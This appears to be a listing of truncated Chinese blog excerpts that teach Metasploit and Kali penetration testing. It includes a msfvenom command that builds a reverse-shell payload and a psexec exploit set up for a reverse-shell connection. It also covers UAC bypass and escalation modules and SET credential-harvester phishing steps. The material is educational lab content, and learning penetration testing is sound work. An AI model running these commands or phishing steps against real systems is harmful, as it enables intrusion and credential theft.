文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 Exploit模块分为主动和被动(Active.Passive) 主动:主动地向目标机器发送payload并执行,使目标交出shell(反连等) 被动:利用目标机器的客户端程序的漏洞来利用,客户端程序请求服务端时候,返回漏洞代码,加载payload,交出shell 我将在下面使用这两种方式做示例: 我启动一个windowXP SP1机器,关闭防火墙,更…
目前最流行,最强大,最具扩展性的渗透测试平台软件 基于metasploit进行渗透测试和漏洞分析的流程和方法 框架集成了渗透测试标准(PETS)思想 一定程度上统一了渗透测试和漏洞研究的工作环境 新的攻击代码可以比较容易加入框架 开发活跃版本更新平率(每周) 使用postgresql数据库存储数据 MSF架构 Rex    基本功能库,用于完成日常基本任务,无需人工手动编码实现    处理 socket 连接诶访问.协议应答(http/SSL/SMB 等)    编码转换(XOR.Base64.…
已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/ask set session -id set filename use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection set session -id set payload 利用漏洞直接提权为systen use…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
nmap扫描 Auxiliary 扫描模块 目前有557个扫描方式…
首先换更新源 :vim  /etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云kali更新源 deb http://mirrors.aliyun.com/kali kali-rolling main non-…
SET (Social Engineering Tools) 1.使用命令:setoolkit 会显示工具菜单 2.输入1 ,选择菜单中的Social-Engineering Attacks (社会工程学攻击) 会显示社会工程攻击的工具 3.输入2,选择Website Attack Vectors 网站(钓鱼)攻击向导  会列出所有的网站(钓鱼)攻击的方法供你选择 4.输入3,选择Credential Harvester Attack Method(密码收割机( ‵▽′)ψ )功能如其名一样.…
Exploit模块 Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等)) msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13 msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp msf5 exploit(w…
我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵windows xp sp3. 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great. 查看某个漏洞的详细信…
不多说,直接上干货! 说在前面的话 注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看.给出了详细的中文 由于篇幅原因,我只使用如下较常用的命令. 这篇博客,利用下面的这个xploit/windows/browser/ms10_046_shortcut_icon_dllloader漏洞来带领大家. 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 201…